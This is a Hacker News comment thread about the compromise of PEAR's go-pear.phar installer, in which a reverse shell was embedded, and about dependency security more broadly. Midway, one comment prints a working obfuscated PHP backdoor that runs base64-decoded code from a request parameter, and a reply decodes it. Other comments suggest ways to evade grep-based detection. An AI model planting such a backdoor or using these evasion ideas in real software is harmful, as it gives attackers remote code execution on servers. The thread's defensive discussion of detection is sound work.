Hacker News new | more | comments | ask | show | jobs | submit login
Pear.php.net shuts down after maintainers discover serious supply-chain attack (arstechnica.com)
144 points by afshinmeh 29 days ago | hide | past | web | favorite | 45 comments

> The officials didn’t say when the hack of their Web server occurred or precisely what the malicious version of go-pear.phar did to infected systems.

From Twitter (https://twitter.com/pear):

> What we know: the tainted go-pear.phar file was reported to us on 1/18 by the Paranoids FIRE Team. The last release of this file was done 12/20, so the taint occurred after that. The taint was verified by us on 1/19.

> What we know: The taint was an embedded line designed to spawn a reverse shell via Perl to IP This IP has been reported to its host in relation to the taint.

> What we know: no other breach was identified. The install-pear-nozlib.phar was ok. The go-pear.phar file at GitHub was ok, and could be used as a good md5sum comparison for any suspect copies.

> If you downloaded go-pear.phar before 12/20, we have no concrete evidence you received a tainted file... but it would be prudent to check your system if you used go-pear.phar to perform a PEAR installation in the last several months.

A good reminder to run your webserver with only the privileges it needs, including read/write permissions on the filesystem outside www and shell execution of commands on the system.

Also not a bad idea to have some kind of file compare against a "known good" folder of your site(s) to determine if any files have been modified or added, such as webshells.

For "known good" folder, a git repository may help, at least to restore a clean version of the code.

Probably preaching to the choir here, but for those who are unaware, be sure that .git directories are not accessible by web clients. It will lead to source code disclosure, and if you've checked in any secrets, credential exposure as well.

That and if the webserver can write to .git it can also invisibly modify the history to ensure that you continue to check out the backdoored code no matter how far you go back.

The challenge for comparisons is doing it all offline and indistinguishable from user activity - I’ve seen cases where the attacker updated tripwire, rpm/deb sums, etc. or only presented the payload to a specific process, requesting IP not on the local network, etc. In this case I’d want something like a random process where a new EC2 instance does a install so you could make it a lot harder to cloak the attack because that’s also what many targets will do.

It just shows how many people verify PGP signatures, if this was discovered after a month.

It doesn't look like they were signing releases until two days ago with 1.10.10.

Aptly timed vulnerability with this article https://research.swtch.com/deps

I do find just pulling dependencies blindly from the internet concerning.

What is the alternative? What do you propose?

Not blindly pulling in dependencies from the internet?

"Blindly" is the problem here, not "pulling dependencies" or "internet".

Also, no, you won't get to a literally 0.0000...% chance of bad stuff getting in to your code, but some simple due diligence will slice several factors of magnitude off your probabilities; pick up another couple of factors if the community in general also tends to have people examining their dependencies. It gets to be pretty hard to sneak stuff in under those circumstances. It's been done, so we know it's not 0.0000...% likely, but it's less likely than the current state of the art in several language communities.

(And, also, yes, said language communities are working on it. I salute them for this effort, not condemn them for the existing problem.)

Hillel Wayne did a detailed in-depth analysis of the event-stream issue and it's really worth reading if you're interested in how to change this situation to be more robust:


I probably still have some old Slackware discs around somewhere.


> Aptly timed vulnerability

I C what you did there https://www.debian.org/security/2019/dsa-4371

Almost, you are mixing up homepage posts. You are talking about https://news.ycombinator.com/item?id=18958679.

I wish I was that clever

Also the discussion on it here: https://news.ycombinator.com/item?id=18979596

Thankfully nobody is using PEAR anymore. Using composer doesn't solve the problem of blinedly pulling internet dependencies, though (as others pointed out).

What I currently do is grepping vendor for common smells like usage of eval() or obfuscations of the same thing after doing a composer update on a project.

> Thankfully nobody is using PEAR anymore

How many thousands of people are in that “nobody”? The places which have legacy baked in are probably also the least equipped to avoid it, too.

Grepping has commonly been evaded since at least the late 90s. lowercased pointed out the use of request values already. Other techniques include encoding a string or byte array and decoding it into a file, pipe, etc. Static analysis can catch some things but it’s fundamentally the halting problem unless you can apply very restrictive sandbox policies — no file I/O, whitelist a few lines which can do certain operations, etc.

It's hard to find obfuscations of stuff. ran across this recently...

<?php $z0=$_REQUEST[‘sort’];$q1=‘’;$c2=“wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2”;$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev(“noi”.“tcnuf”.“_eta”.“erc”);$j6=$v5(“”,$q1($z0));$j6();?>

There's no 'eval' or 'base64_decode' easy thing to grep for.

You might be able to catch that by looking for lines with unusually high entropy. Something like this: https://codereview.stackexchange.com/a/909

The problem with approaches like this is that they're prone to false positive/negatives. Take the example above — you could move more payload into the REQUEST variable (say a Cookie header), do more of the array of numbers so no individual token is that noteworthy, you could do something like toss that into a wrapper so someone sees something which looks like (and may actually be) an x509 cert or GPG public key with some misleading comment about that being used to verify updates, toss it into an image or other “fixture” in a test directory a la event-stream, etc.

This is a much harder problem than anything someone is going to come up with in an HN reply on first reaction. People have been working on it for decades but it's especially hard because once a technique becomes popular an attacker can run offline attacks against it and not release their exploit until they've confirmed that it's not detected.

Agree that is difficult to catch it. For the log, in this case there are both functions, the output looks something like this:

  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution
The `create_function()`[1] will internally execute `eval()` so the result would be the same.

[1] http://php.net/create_function

Grep for multiple semicolons on a line. Or lines exceeding N characters. Or `$_` outside some specific places. Or multiple short variable names on the same line. Or "<?php[^$]".

Salt and flavour per your coding style and code base.

No, that's just an arms race, and it's advantage attacker since in security we generally assume the attacker has our source and executables. Plus it's ultimately an instance of the halting problem; there is no way to run code to determine if another piece of code is "good" for any sensible definition of "good". (See Rice's Theorem.)

You need to ensure bad stuff can't get in, not let stuff in and try to determine what's bad after the fact.

What aspect of information security is not inherently advantage attacker?

Regarding "ensure bad stuff can't get in", that is a completely different aspect. No matter how well you "ensure", bad stuff will always get it. Thus security is done in layers.

You could create a readability score from normal non-malicious code.

Eventhough I do not know what above code does, at a glance, I can tell that this is not normal code. A machine could too.

I think package management is very dangerous!

Does anyone know if composer ever uses PEAR?

It doesn't.

Composer does support pulling packages from PEAR (https://getcomposer.org/doc/05-repositories.md#pear), but through their own implementation and not go-pear.phar.

...but that doesn't mean that it wouldn't also be susceptible to this kind of attack.

Are GNU/Linux distros affected?

Only an installer on pear.php.net was compromised. I think a "proper" package would be built from the source code, bypassing that installer.

But a more ad hoc package, like from Arch's AUR, might just fetch that installer from pear.php.net instead. In fact, that's what the AUR package did - it just hardcodes the URL of the installer.

The AUR package was (probably) not compromised, but perhaps only because it happened to use the nozlib version of the installer instead of the version that was compromised.

This is how the AUR package looked at the time: https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=php-p...

And this is how it looks now: https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=php-p...

The old PKGBUILD does have a hash, but I don't know if it was obtained from a trusted source. So I would guess that if it had used the compromised installer, and the installer was compromised after the PKGBUILD was updated to use that release, it would have alerted people that the installer had been replaced.

The new PKGBUILD uses the Github release and includes a PGP key.


I think that comic is about people who voluntarily stop maintaining/publishing something other people rely on, not about more general supply chain security.

Although, the same applies to packages and libraries. So I would called related, but not entirely on topic.

I'm not doing PHP anymore, but never heard of PEAR, everybody seems to use Composer since quite a while. Seems like the transition happened in 2014-2015.

If a company does not invest in open source and uses it - it has to invest into open source to kee using it. Well at least it's under the security budget and doesn't look like a voluntarily paid tax anymore.

This article is outdated. Check the PEAR Twitter profile for new information.

It would be nice if journalists would keep up with the things they report on.

It would be nice if you'd highlight what is outdated rather than a vague assertion and a "go look on Twitter".

Maybe even provide a link to the Twitter profile.

Even if it's not shut down anymore the information is still highly relevant.

It's still down though

Applications are open for YC Summer 2019

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact